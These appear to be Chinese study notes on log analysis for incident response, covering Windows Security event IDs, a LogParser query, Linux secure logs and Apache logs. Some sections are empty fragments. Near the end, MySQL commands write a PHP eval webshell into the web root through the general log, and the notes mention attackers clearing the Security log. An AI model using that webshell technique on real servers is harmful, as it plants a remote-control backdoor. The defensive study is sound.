日志:日志文件为服务器、工作站、防火墙和应用软件等IT资源相关活动记录必要的、有价值的信息。日志文件中的记录可提供以下用途:监控系统资源;审计用户行为;对可疑行为进行告警;确定入侵行为的范围;为恢复系统提供帮助;生成调查报告;为打击计算机犯罪提供证据来源。
日志分析的目的:
在安全事件的应急处置中,日志分析的目的很明确,就是要对攻击行为进行溯源。
攻击者IP:定位攻击者,用于抓捕或者进一步溯源
攻击范围、攻击流程:摸清攻击行为,寻找过程中的安全薄弱点,进行加固防范利用的脆弱点:针对性的进行漏洞加固
1、信息收集:为什么要做信息收集
2、日志分析:
3、日志分析整理:
日志审计是应急响应中很重要的一个部分,那么在windows下通常会对应用程序日志、安全日志以及系统日志进行审计。
在默认情况下,安全日志仅仅只记录一些简单的登录日志,因为安全日志会随着计算机的使用时间而不断增长,占用使用空间。所以若我们需要记录详细的安全日志,则需要通过修改本地策略来启用其它项的安全日志记录功能。
在windows中,若运维人员开启了记录所有安全日志项,那么攻击者在拿到该服务器权限后的所有操作都可以在该安全日志中被记录到。所以清空该Security日志肯定是一个善后的必然选择。
1102:日志清除
4720:添加用户
4726:删除用户
4624:登入
4634:注销
4625:登录失败事件
4732:将创建的用户加入到用户组中
4733:则是查看用户从哪个组中移除了
该事件记录信息中,计划任务schtasks以及at都会被记录在内:包括创建者、任务名称、任务内容等。
4698:计划任务已创建
4699:计划任务已删除
4700:计划任务已启用
4701:计划任务已停用
4702:计划任务已更新日志路径:
C:\Windows\System32\winevt\Logs
EventID 事件ID
TimeGenerated 时间
Strings
命令:
LogParser.exe -i:evt -o:datagrid "select * from sec.evtx where EventID='4624'
and TimeGenerated>'2022-03-24 10:00:00'"
登录认证日志:通过分析/var/log/secure文件,我们可以得到登录信息,包含验证和授权方面的信息,sshd会将所有信息都记录其中,包括登录失败的信息。secure日志会随着时间为结尾名来进行分量保存,以防止文件过大。
在http.conf中开启日志
日志文件存放在apache/logs下,access.log为访问日志
set global general_log=on;
set global general_log_file='C:/phpStudy/WWW/789.php';
select '<?php eval($_POST['a']) ?>';ip.dst==192.168.32.132
ip.src==192.168.32.132
ip.addr==192.168.32.132